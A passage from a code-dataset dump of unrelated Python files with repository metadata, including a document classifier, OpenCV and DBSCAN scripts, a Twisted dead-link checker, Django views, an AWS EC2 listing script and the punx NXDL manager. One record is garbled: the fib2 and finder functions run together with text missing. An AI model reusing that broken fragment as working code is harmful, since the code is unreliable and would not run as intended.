heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(selection)))\n\t\treturn self.getFunction(combinedFeature,*features)\nclass mlModel:\n\t# a model is a mapping from an abstract feature space F and a set of labels L to the unit interval [0,1].\n\t# they are created from by a machine learning algorithm. This class should be inherited from\n\t__slots__=[]\n\tdef getProbabilities(self,vectors):\n\t\traise NotImplementedError\n\t\t#vectors is a list of elements of F.\n\t\t#should return a dict or counter of the form {l1: p1, ..., ln:pn} where L={l1,...,ln} are the different labels\n\t\t#and p1,...,pn in [0,1]. A higher value for pi means that label li is more likely.\n\tdef getPrediction(self,vectors):\n\t\t# gets a list of elements of V and returns a list of same lengths of elements in L.\n\t\t# returns an element with maximal probability\n\t\treturn [countermax(p) for p in self.getProbabilities(vectors)]\n\tdef free(self):\n\t\tpass # may be inherited to be reliably called when not needed any more.\n\t# derived classes should further make sure they are picklable (i.e. implement __getstate__ and __setstate__)\nclass learningMachine:\n\t# a learning maching takes a list of tuples (v,l) where v is an element of an abstract feature space F and\n\t# l is a label. It returns an instance of mlModel with the same label set and feature space.\n\t# instances of this class should be hashable.\n\t__slots__=[]\n\tdef getModel(self,labels,vectors):\n\t\tpass\nclass argumentPassingLearningMachine(learningMachine):\n\t#takes a class derived from mlModel. For each call of getModel, it passes the arguments to the __init__-function of the given class.\n\t__slots__=['modelClass']\n\tdef __init__(self,modelClass):\n\t\tself.modelClass = modelClass\n\tdef getModel(self,labels,vectors):\n\t\treturn self.modelClass(labels,vectors)\nclass easyparallelArgumentPassingLearningMachine(learningMachine):\n\t#takes a class derived from mlModel. 
For each call of getModel, it passes the arguments to the __init__-function of the given class.\n\t#the init-function MAY be called in another process (using multiprocessing), so it should not modify any global state.\n\t__slots__=['modelClass']\n\tdef __init__(self,modelClass):\n\t\tself.modelClass = modelClass\n\tdef getModel(self,labels,vectors):\n\t\treturn easyparallel.callWorkerFunction(self.modelClass,labels,vectors)\nclass documentClassifier(documentFunction):\n\t__slots__=['feature','model']\n\tdef __init__(self,trainingDocbase,feature,ml):\n\t\tdocbase = trainingDocbase\n\t\tself.feature = feature\n\t\tauthors = [doc.author for doc in trainingDocbase.documents]\n\t\tvectors = feature.getValuev(trainingDocbase.documents)\n\t\tprint(\"start classifying with %d vectors and %d features\" % (len(vectors),feature.vectorLength()))\n\t\t#self.regression = easyparallel.callWorkerFunction(regression.multiclassLogit,authors,vectors)\n\t\tfor vec in vectors:\n\t\t\tfor i,x in enumerate(vec):\n\t\t\t\tif math.isnan(x):\n\t\t\t\t\tvec[i]=0\n\t\tself.model = ml.getModel(authors,vectors)\n\t\tprint(\"returned from classifying with %d vectors and %d features\" % (len(vectors),feature.vectorLength()))\n\t\tif hasattr(feature,'functionCollection'):\n\t\t\tself.functionCollection = feature.functionCollection\n\t\tsuper().__init__()\n\tdef mappingv(self,documents):\n\t\t#return self.regression.predict(self.feature.getValuev(documents))\n\t\tprint(\"start predicting with %d features and %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\tvectors = self.feature.getValuev(documents)\n\t\tprint(\"got %d features for %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\t#result = easyparallel.callWorkerFunction(self.regression.getProbabilities,vectors)\n\t\tresult = self.model.getProbabilities(vectors)\n\t\tprint(\"got probabilities %d features and %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\treturn result\n\t\t'''\n\tdef getProbabilities(self,documents):\n\t\treturn self.regression.getProbabilities(self.feature.getValuev(documents))\n\t\t'''\n\tdef predict(self,documents):\n\t\tprobs = self.getValuev(documents)\n\t\treturn [countermax(p) for p in probs]\n\tdef dumps(self):\n\t\treturn pickle.dumps( (self.functionCollection.getFeatureIdentifier(self.feature), self.model))\n\tdef loads(self,state,functionCollection):\n\t\tself.functionCollection = functionCollection\n\t\tstate = pickle.loads(state)\n\t\tself.feature = functionCollection.getFunction(*state[0])\n\t\tself.model = state[1]\n\t\tsuper().__init__()\n\tdef free(self):\n\t\tself.clearCache()\n\t\tself.model.free()\n\t\tself.feature.removeFromFunctionCollection()\ndef loadClassifier(state,functionCollection):\n\tresult = documentClassifier.__new__(documentClassifier)\n\tresult.loads(state,functionCollection)\n\treturn result\nif __name__== '__main__':\n\timport regression\n\tcoll = documentFunctionCollection()\n\tbase = documentbase([document('This is your father','papa'), document('This is your mother.', 'mama')])\n\tbase.functionCollection = coll\n\tview1 = characterView([1,2,3])\n\tview1.functionCollection = coll\n\tfeature1 = view1.getFeature(base)\n\tprint(\"feature 1:\")\n\tprint(feature1.getValuev(base.documents))\n\tprint(\"use this learning maching: \",regression.multiclassLogit)\n\tclassifier1 = documentClassifier(base, feature1, regression.multiclassLogit)\n\tprint(classifier1.getValuev(base.documents))\n\tview2 = lexicalView()\n\tview2.functionCollection = coll\n\tfeature2 = 
view2.getFeature(base)\n\tprint(\"feature 2:\")\n\tprint(feature2.getValuev(base.documents))\n\tclassifier2 = documentClassifier(base, feature2, regression.multiclassLogit)\n\tprint(classifier2.getValuev(base.documents))\n\tview3 = syntacticView([1,2,3],0,10,2)\n\tview3.functionCollection = coll\n\tfeature3 = view3.getFeature(base)\n\tprint(\"feature 3:\")\n\tprint(feature3.getValuev(base.documents))\n\tclassifier3 = documentClassifier(base, feature3, regression.multiclassLogit)\n\tprint(classifier3.getValuev(base.documents))\n\tdumped = classifier3.dumps()\n\tprint(\"clasifier 3 got dumped to \"+repr(dumped))\n\tprint(loadClassifier(dumped,coll).getValuev(base.documents))\n","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":29603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50523532","text":"\nimport cv2\n\ncap = cv2.VideoCapture(\"Roads - 1952.mp4\")\n\n# Object detection from stable camera\nobject_detector = cv2.createBackgroundSubtractorMOG2()\n\n\nwhile True:\n ret, frame = cap.read()\n height, width,_ = frame.shape\n\n # print(height,width)\n\n # Extract the field of intrest\n roi = frame[150:,295:]\n print(roi)\n\n # Object dection\n mask = object_detector.apply(frame)\n countor, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in countor:\n # Calculate the area and eleminate small areas\n area = cv2.contourArea(cnt)\n if area > 100:\n cv2.drawContours(frame,[cnt],-1,(0,255,0))\n \n\n cv2.imshow(\"Roi\",roi)\n cv2.imshow(\"Frame\",frame)\n # cv2.imshow(\"Mask\",mask)\n\n\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546961099","text":"def ask_ok(prompt, retries=3, reminder='Please try again!!'):\n while True:\n ok=input(prompt)\n if ok in('y','yes'):\n return True\n if ok in('n','no'):\n return False\n retries=retries-1\n if retries < 0:\n raise ValueError('invalid user response')\n print(reminder)\n input(\"Press Enter to continue...\") \ndef fib2(n):\n result=[]\n a,b=0,1\n while a 0:\n return item\n\n\n\n\nprint(finder([1,2,3,4,5,6,7], [3,7,2,1,4,6]))\n\n\n# solution with sort\n\ndef finder_two(arr_one: list, arr_two:list):\n for num_one, num_two in zip(arr_one, arr_two):\n if num_one != num_two:\n return num_one\n return arr_one[-1]","sub_path":"python/array/missing-element.py","file_name":"missing-element.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477160118","text":"import time\nimport json\n\n\ndef accept_rate(data):\n N = len(data)\n accept = 0\n for line in data:\n if \"None\" not in line.values():\n accept += 1\n return accept / N\n\n\ndef longest_dur(data):\n max_ = 0\n for line in data:\n if \"None\" not in line.values():\n apply = time.mktime(time.strptime(line[\"applied\"], '%m-%d-%Y %H:%M'))\n offer = time.mktime(time.strptime(line[\"offer\"], '%m-%d-%Y %H:%M'))\n max_ = max(max_, (offer - apply) / 3600)\n return max_\n\n\ndef most_fail_stage(data):\n # index 1:onsite, 2:phone, 3:apply\n stages = [0,0,0,0]\n for line in data:\n res = tuple(line.values())\n if \"None\" in res:\n i = res.count(\"None\")\n stages[i] += 1\n i = stages.index(max(stages))\n if i == 3:\n stage = \"applied\"\n elif i == 2:\n 
stage = \"phone\"\n else:\n stage = 'onsite'\n return stage, stages[i]\n","sub_path":"django-job-stat/JobMatch/stages/stage_stat.py","file_name":"stage_stat.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"89326173","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 17 18:22:11 2018\n\n@author: George\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfileName = r'C:\\Users\\George\\Desktop\\trial_2.txt'\n\nXc = np.loadtxt(fileName,skiprows=1,usecols=(3,))\nYc = np.loadtxt(fileName,skiprows=1,usecols=(4,))\nchannelList = np.loadtxt(fileName,skiprows=1,usecols=(0,), dtype=str)\n\ncolourMap = []\n\nAl561 = []\nAl647 = []\n\nfor i in range(len(channelList)):\n if channelList[i] == 'Alexa561':\n colourMap.append('red')\n Al561.append([Xc[i],Yc[i]])\n \n if channelList[i] == 'Alexa647':\n colourMap.append('blue')\n Al647.append([Xc[i],Yc[i]])\n\n#plt.scatter(Xc,Yc,c=colourMap)\nx,y = zip(*Al561)\n#plt.scatter (x,y)\n\n#### cluster Al561\nfrom sklearn.cluster import DBSCAN\n#clustering is dependent on epsilon value (eps)\ndbscan = DBSCAN(eps=30).fit(Al561)\n#get all clustering labels - labels indicate the cluster the points has been assigned to\nlabels = dbscan.labels_\n#work out unique labels for colours\nunique_labels = set(labels)\nprint ('Number of clusters assigned = ' + str(len(unique_labels)))\n#assign colours to labels\ncolours = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\n#create dictionary of labels and colours\ncolourIndex = dict(zip(unique_labels, colours))\n#create list of colours, indexed the same as x,y position, for plotting\nclusterColourMap = []\nfor label in labels:\n clusterColourMap.append(colourIndex[label])\n\n#plot x,y coordinates with cluster colours\nplt.scatter (x, y, c=clusterColourMap)\n","sub_path":"scatterPlot_superRes.py","file_name":"scatterPlot_superRes.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281588785","text":"import os\nimport signal\nimport logging\nimport argparse\n\nfrom twisted.internet import defer, task\n\nfrom deadurl_tester import init_logging\nfrom deadurl_tester.actions import test_url_action, extract_links_action\n\n\nclass DeadLinksIdentifier(object):\n def __init__(self, jobs, url):\n self.log = logging.getLogger(self.__class__.__name__)\n self.jobs = jobs\n self.url = url\n self.extract_links_action = extract_links_action.URLParser()\n self.test_url_action = test_url_action.URLTester()\n self.dead_url_list = []\n\n # this is a some kind of queue obj with X numbers of workers\n @defer.inlineCallbacks\n def find_dead_links(self, url_list, jobs):\n coop = task.Cooperator()\n wait_task_deferreds = []\n for job_number in range(jobs):\n self.log.info('scheduling #%s task', job_number)\n gen = self.find_dead_url_generator(url_list)\n wait_task_deferreds.append(coop.coiterate(gen))\n self.log.info('waiting %s tasks to complete...', len(wait_task_deferreds))\n yield defer.DeferredList(wait_task_deferreds)\n self.log.info('completed %s tasks : dead links finder', len(wait_task_deferreds))\n\n def find_dead_url_generator(self, url_list):\n while url_list:\n one_url = url_list.pop()\n formatted_url = self.format_link(one_url)\n yield self.test_one_url(formatted_url)\n\n @defer.inlineCallbacks\n def test_one_url(self, one_url):\n # GET requests will not be started in parallel unless 
threads.deferToThread is used\n # Or Twisted spawnProcess\n # this part can be speed up - it is a single thread now\n response_code = yield self.test_url_action(one_url)\n if not response_code:\n # this is unhandled error\n self.dead_url_list.append(one_url)\n if str(response_code).startswith('4'):\n # this is 4xx Client errors\n self.dead_url_list.append(one_url)\n if str(response_code).startswith('5'):\n # this is 5xx Server error\n self.dead_url_list.append(one_url)\n\n def format_link(self, href):\n # follow local links\n if href.startswith('/'):\n href = self.url + href\n elif not href.startswith('http'):\n href = self.url + '/' + href\n return href\n\n @defer.inlineCallbacks\n def run(self):\n self.log.info('extracting all link from: %s', self.url)\n links_obj = yield self.extract_links_action(self.url)\n links = links_obj.links\n self.log.info('found links to test: %s -> %s', len(links), links)\n yield self.find_dead_links(links, self.jobs)\n if self.dead_url_list:\n self.log.info('Found %s dead links: %s', len(self.dead_url_list), self.dead_url_list)\n else:\n self.log.debug('No dead links found')\n\n\n@defer.inlineCallbacks\ndef main(reactor, args):\n \"\"\" Entry point.\"\"\"\n app = DeadLinksIdentifier(args.jobs, args.url)\n yield app.run()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--verbose', action='append_const', const=1)\n parser.add_argument('-l', '--logdir', default='./', required=False)\n parser.add_argument('-j', '--jobs', default=4, type=int, required=False)\n parser.add_argument('-u', '--url', required=True)\n args = parser.parse_args()\n init_logging(args)\n try:\n task.react(main, [args])\n finally:\n os.killpg(0, signal.SIGKILL)\n","sub_path":"python/deadurl_tester/deadurl_tester/app/app_deadurl_scaner.py","file_name":"app_deadurl_scaner.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"521936318","text":"from django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Entry\nfrom django.db.models import Q\n\n\nclass EntriesList(LoginRequiredMixin,ListView):\n model = Entry\n template_name = 'entries/home.html'\n context_object_name = 'entries'\n paginate_by = 5\n\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Home'\n return context\n \n def get_queryset(self): # Overwrite method\n return Entry.objects.filter(author = self.request.user).order_by('-date_posted')\n\nclass EntriesDetail(LoginRequiredMixin, DetailView):\n model = Entry\n template_name = 'entries/entry_detail.html'\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Home'\n return context\n \n\nclass CreateEntry(LoginRequiredMixin, CreateView):\n model = Entry\n fields = ['title', 'content']\n \n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n \n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Create Entry'\n return context\n\nclass DeleteEntry(LoginRequiredMixin, DeleteView):\n model = Entry\n 
success_url = reverse_lazy('home')\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Delete Entry'\n return context\n\nclass UpdateEntry(LoginRequiredMixin, UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Edit Entry'\n return context\n\nclass SearchEntry(LoginRequiredMixin, ListView):\n model = Entry\n template_name = 'entries/search_results.html'\n context_object_name = 'entries'\n paginate_by = 5\n\n def get_queryset(self):\n user = self.request.user\n query = self.request.GET.get('search_entries')\n if user:\n object_list = Entry.objects.filter(\n Q(title__icontains=query) | (Q(content__icontains=query))).filter(author=user)\n return object_list\n \n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Search Entries'\n return context","sub_path":"entries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547621084","text":"### TESTING AREA ###\n\nimport xml.etree.cElementTree as ET\n\n\nosm_file = 'example.xml'\n\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\n \"\"\"Yield element if it is the right type of tag\"\"\"\n\n context = ET.iterparse(osm_file, events=('start', 'end'))\n _, root = next(context)\n for event, elem in context:\n if event == 'end' and elem.tag in tags:\n yield elem\n root.clear()\n \ntree = ET.parse('example.xml')\nroot = tree.getroot()\nprint(tree.getroot())\nprint(root.tag)\nprint(root.attrib)\n\nfor element in root:\n print(element.tag, element.attrib)","sub_path":"get_element_test.py","file_name":"get_element_test.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375834921","text":"class Coordinate(object):\n def __init__ (self, x, y):\n self.x = x\n self.y = y\n def distance (self, other):\n x_diff_sq = (self.x - other.x)**2\n y_diff_sq = (self.y - other.y)**2\n return (x_diff_sq + y_diff_sq)**0.5\n def __str__(self):\n return \"<\"+str(self.x)+\",\"+str(self.y)+\">\"\n \n def __sub__(self, other):\n return Coordinate(self.x-other.x, self.y - other.y)\n \n\nc =Coordinate(3,4)\norigin = Coordinate(0,0)\nprint(c)\nprint(origin)\nprint(type(origin))\nprint(type(c))\n\nprint(c.x)\n\nprint(origin.x)\nprint(c.distance(origin))\n\nprint(Coordinate.distance(c,origin))\nprint(c-origin)","sub_path":"OOP_prac.py","file_name":"OOP_prac.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"321225355","text":"import argparse\nimport os\nfrom shutil import copyfile\n\n\nfrom energypy.common import ensure_dir\n\n\ndef make_config_parser():\n \"\"\"\n Parses arguments from the command line for running config experiments\n\n returns\n args (argparse NameSpace)\n \"\"\"\n parser = argparse.ArgumentParser(\n description='energypy config expt argparser'\n )\n\n # required\n parser.add_argument('expt_name', default=None, type=str)\n parser.add_argument('run_name', default=None, type=str)\n\n args = parser.parse_args()\n\n return args\n\n\ndef make_paths(\n experiments_dir,\n expt_name,\n run_name,\n load_configs=True\n):\n \"\"\"\n Creates a dictionary of 
paths for use with experiments\n\n args\n experiments_dir (str) usually energypy/energypy/experiments\n expt_name (str)\n run_name (str)\n\n returns\n paths (dict) {name: path}\n\n Folder structure\n experiments/configs/expt_name/expt.ini\n runs.ini\n\n experiments/results/expt_name/run_name/tensorboard/run_name/rl\n /act\n /learn\n env_histories/ep_1/info.csv\n ep_2/info.csv\n e..\n expt.ini\n runs.ini\n agent_args.txt\n env_args.txt\n info.log\n debug.log\n \"\"\"\n # rename the join function to make code below easier to read\n join = os.path.join\n\n results_dir = join(experiments_dir, 'results', expt_name)\n\n if load_configs:\n config_dir = join(experiments_dir, 'configs', expt_name)\n\n config_paths = {\n 'expt_config': join(config_dir, 'expt.ini'),\n 'run_configs': join(config_dir, 'runs.ini')\n }\n\n ensure_dir(join(results_dir, run_name))\n\n # copy config files into results directory\n copyfile(\n config_paths['expt_config'], join(results_dir, 'expt.ini')\n )\n\n copyfile(\n config_paths['run_configs'], join(results_dir, 'runs.ini')\n )\n else:\n config_paths = {}\n\n results_paths = {\n\n # tensorboard runs are all in the tensorboard folder\n # this is for easy comparison of runs\n 'tb_rl': join(results_dir, 'tensorboard', run_name, 'rl'),\n 'tb_act': join(results_dir, 'tensorboard', run_name, 'act'),\n 'tb_learn': join(results_dir, 'tensorboard', run_name, 'learn'),\n\n # run specific\n 'env_histories': join(results_dir, run_name, 'env_histories'),\n 'debug_log': join(results_dir, run_name, 'debug.log'),\n 'info_log': join(results_dir, run_name, 'info.log'),\n 'env_args': join(results_dir, run_name, 'env_args.txt'),\n 'agent_args': join(results_dir, run_name, 'agent_args.txt'),\n 'ep_rewards': join(results_dir, run_name, 'episode_rewards.csv'),\n 'memory': join(results_dir, '{}_memory.pkl'.format(run_name))\n }\n\n paths = {**config_paths, **results_paths}\n\n # make sure all of our paths exist\n for key, path in paths.items():\n ensure_dir(path)\n\n\n return paths\n","sub_path":"energypy/experiments/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"188549819","text":"import boto3\nimport os\n\n# get credentials from environment variables\nACCESS_KEY = os.environ['ACCESS_KEY']\nSECRET_KEY = os.environ['SECRET_KEY']\n\nsession = boto3.Session(\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY\n #aws_session_token=SESSION_TOKEN\n)\n\nec2client = session.client('ec2')\n# or via the credentials file in ~/.aws/\n#ec2client = boto3.client('ec2')\nresponse = ec2client.describe_instances()\nfor reservation in response[\"Reservations\"]:\n print(str(len(reservation[\"Instances\"])) + \" EC2 instances in this reservation\")\n for instance in reservation[\"Instances\"]:\n # This sample print would output the entire Dictionary object\n #print(instance)\n # This print will output the value of the Dictionary key 'InstanceId'\n print(instance[\"InstanceId\"])\n print(instance['LaunchTime']) \n","sub_path":"get-ec2.py","file_name":"get-ec2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"300470001","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-----------------------------------------------------------------------------\n# :author: Pete R. Jemian\n# :email: prjemian@gmail.com\n# :copyright: (c) 2017, Pete R. 
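# A short usage sketch for make_paths() above; the experiment and run names
# are invented for illustration, and load_configs=False skips the .ini
# copying so no config files need to exist:
paths = make_paths('energypy/energypy/experiments', 'battery_expt', 'run_0',
                   load_configs=False)
# e.g. paths['tb_rl']    -> .../results/battery_expt/tensorboard/run_0/rl
#      paths['info_log'] -> .../results/battery_expt/run_0/info.log
# every value is passed through ensure_dir(), so building the dict also
# creates the directories on disk as a side effect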
Jemian\n#\n# Distributed under the terms of the Creative Commons Attribution 4.0 International Public License.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n\n'''\nLoad and/or document the structure of a NeXus NXDL class specification\n'''\n\nfrom __future__ import print_function\n\nimport collections\nimport copy\nimport lxml.etree\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nimport punx\nimport punx.singletons\nimport punx.nxdl_schema\n\n\nclass NXDL_Manager(object):\n '''\n the NXDL classes found in ``nxdl_dir``\n '''\n\n nxdl_file_set = None\n \n def __init__(self, file_set):\n import punx.cache_manager\n assert(isinstance(file_set, punx.cache_manager.NXDL_File_Set))\n if file_set.path is None or not os.path.exists(file_set.path):\n raise punx.FileNotFound('NXDL directory: ' + str(file_set.path))\n \n self.nxdl_file_set = file_set\n self.classes = collections.OrderedDict()\n# get_element = file_set.nxdl_element_factory.get_element\n \n for nxdl_file_name in get_NXDL_file_list(file_set.path):\n definition = NXDL_element__definition(file_set.path) # the default\n obj = copy.deepcopy(definition) # ALWAYS make a copy of that\n # TODO: adjust minOccurs defaults for application definition or contributed definition\n obj.set_file(nxdl_file_name)\n obj.parse()\n self.classes[obj.title] = obj\n\n\ndef get_NXDL_file_list(nxdl_dir):\n '''\n return a list of all NXDL files in the ``nxdl_dir``\n '''\n if not os.path.exists(nxdl_dir):\n raise punx.FileNotFound('NXDL directory: ' + nxdl_dir)\n NXDL_categories = 'base_classes applications contributed_definitions'.split()\n nxdl_file_list = []\n for category in NXDL_categories:\n path = os.path.join(nxdl_dir, category)\n if not os.path.exists(path):\n raise IOError('no definition available, cannot find ' + path)\n for fname in sorted(os.listdir(path)):\n if fname.endswith('.nxdl.xml'):\n nxdl_file_list.append(os.path.join(path, fname))\n return nxdl_file_list\n\n\ndef validate_xml_tree(xml_tree):\n '''\n validate an NXDL XML file against the NeXus NXDL XML Schema file\n\n :param str xml_file_name: name of XML file\n '''\n import punx.schema_manager\n schema = punx.schema_manager.get_default_schema_manager().lxml_schema\n try:\n result = schema.assertValid(xml_tree)\n except lxml.etree.DocumentInvalid as exc:\n raise punx.InvalidNxdlFile(str(exc))\n return result\n\n\n# class NXDL_Base(object):\n# '''\n# a complete description of a specific NXDL definition\n# '''\n# \n# parent = None\n# \n# def __init__(self, parent):\n# self.parent = parent\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# do not call this from the constructor due to infinite loop\n# '''\n# pass\n# \n# \n# class NXDL_element__definition(NXDL_Base):\n# '''\n# a complete description of a specific NXDL definition\n# '''\n# \n# title = None\n# category = None\n# file_name = None\n# nxdl = None\n# lxml_tree = None\n# nxdl_file_set = None\n# \n# nxdl_attributes = {}\n# nxdl_groups = {}\n# nxdl_fields = {}\n# nxdl_symbols = {}\n# \n# __parsed__ = False\n# \n# def __init__(self, file_set):\n# self.nxdl_file_set = file_set\n# NXDL_Base.__init__(self, None)\n# \n# def __getattribute__(self, *args, **kwargs):\n# '''\n# implement lazy load of definition content\n# '''\n# if len(args) == 1 and args[0] == 'lxml_tree' and not self.__parsed__:\n# self.parse() # only parse this 
file once content is requested\n# return object.__getattribute__(self, *args, **kwargs)\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# :param obj rules: instance of Schema_Attribute\n# \n# do not call this from the constructor due to infinite loop\n# '''\n# get_element = self.nxdl_file_set.nxdl_element_factory.get_element # alias\n# \n# for k, v in rules.attrs.items():\n# self.nxdl_attributes[k] = get_element('attribute', parent=self)\n# \n# _breakpoint = True # TODO:\n# \n# def set_file(self, fname):\n# self.file_name = fname\n# self.title = os.path.split(fname)[-1].split('.')[0]\n# self.category = os.path.split(os.path.dirname(fname))[-1]\n# \n# def parse(self):\n# '''\n# parse the XML content\n# \n# This step is deferred until self.lxml_tree is requested\n# since only a small subset of the NXDL files are typically\n# referenced in a single data file.\n# '''\n# if self.__parsed__:\n# return # only parse this file when content is requested\n# \n# if self.file_name is None or not os.path.exists(self.file_name):\n# raise punx.FileNotFound('NXDL file: ' + str(self.file_name))\n# \n# self.lxml_tree = lxml.etree.parse(self.file_name)\n# self.__parsed__ = True # NOW, the file has been parsed\n# \n# try:\n# validate_xml_tree(self.lxml_tree)\n# except punx.InvalidNxdlFile as exc:\n# msg = 'NXDL file is not valid: ' + self.file_name\n# msg += '\\n' + str(exc)\n# \n# # parse the XML content of this NXDL definition element\n# for node in self.lxml_tree.getroot():\n# if isinstance(node, lxml.etree._Comment):\n# continue\n# \n# element_type = node.tag.split('}')[-1]\n# if element_type not in ('doc',):\n# obj = self.nxdl_file_set.nxdl_element_factory.get_element(element_type)\n# _break = True\n# \n# \n# class NXDL_element__attribute(NXDL_Base):\n# '''\n# a complete description of a specific NXDL attribute element\n# \n# :param obj parent: instance of NXDL_Base\n# '''\n# \n# def __init__(self, parent):\n# NXDL_Base.__init__(self, parent)\n# self.name = None\n# self.type = 'str'\n# self.required = False\n# self.default_value = None\n# self.enum = []\n# self.patterns = []\n# self.nxdl_attributes = {}\n# \n# def __str__(self, *args, **kwargs):\n# msg = '%s(' % type(self).__name__\n# l = []\n# for k in 'name type required default_value enum patterns'.split():\n# l.append('%s=%s' % (k, str(self.__getattribute__(k))))\n# msg += ', '.join(l)\n# msg += ')'\n# \n# return msg\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# :param obj rules: instance of Schema_Attribute\n# '''\n# if self.parent is not None:\n# get_element = self.parent.nxdl_file_set.nxdl_element_factory.get_element\n# elif hasattr(self, 'nxdl_file_set'):\n# get_element = self.nxdl_file_set.nxdl_element_factory.get_element # alias\n# else:\n# raise RuntimeError('cannot locate get_element()')\n# \n# for k in 'required default_value enum patterns name type'.split():\n# if hasattr(rules, k):\n# self.__setattr__(k, rules.__getattribute__(k))\n# # TODO: convert type (such as nx:validItemName into pattern\n# # self.parent.nxdl.children['attribute']\n# \n# for k, v in rules.attrs.items():\n# self.nxdl_attributes[k] = get_element('attribute', parent=self)\n# \n# _breakpoint = True # TODO:\n# \n# \n# class NXDL_element__field(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL field\n# '''\n# \n# optional = True\n# \n# nxdl_attributes = {}\n# \n# \n# class NXDL_element__group(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL 
group\n# '''\n# \n# optional = True\n# \n# nxdl_attributes = {}\n# nxdl_groups = {}\n# nxdl_fields = {}\n# \n# \n# class NXDL_element__link(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL link\n# '''\n# \n# optional = True\n# \n# \n# class NXDL_element__symbols(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL symbol\n# '''\n# \n# optional = True\n\n\nclass Mixin(object):\n \n def __init__(self): # TODO:\n pass\n \n def __str__(self, *args, **kwargs):\n return punx.nxdl_schema.render_class_str(self)\n\n\nclass NXDL_element__definition(punx.singletons.Singleton, Mixin):\n '''\n contents of a *definition* element in a NXDL XML file\n \n :param str path: absolute path to NXDL definitions directory (has nxdl.xsd)\n '''\n \n def __init__(self, path):\n self.nxdl_path = path\n self.schema_file = os.path.join(path, punx.nxdl_schema.NXDL_XSD_NAME)\n assert(os.path.exists(self.schema_file))\n nxdl_defaults = punx.nxdl_schema.NXDL_Summary(self.schema_file)\n \n for k, v in nxdl_defaults.definition.__dict__.items():\n self.__setattr__(k, v)\n del self.children\n\n # parse this content into classes in _this_ module\n for k, v in self.attributes.items():\n attribute = NXDL_element__attribute(nxdl_defaults.attribute)\n obj = copy.deepcopy(attribute) # ALWAYS make a copy of that\n for item in 'name type required'.split():\n obj.__setattr__(item, v.__getattribute__(item)) # TODO: should override default\n del obj.maxOccurs\n del obj.minOccurs\n # TODO: what else to retain?\n self.attributes[k] = obj\n\n for k, v in self.elements.items(): # TODO: is this a field?\n print(k, str(v))\n# field = NXDL_element__field(nxdl_defaults.field)\n# obj = copy.deepcopy(field) # ALWAYS make a copy of 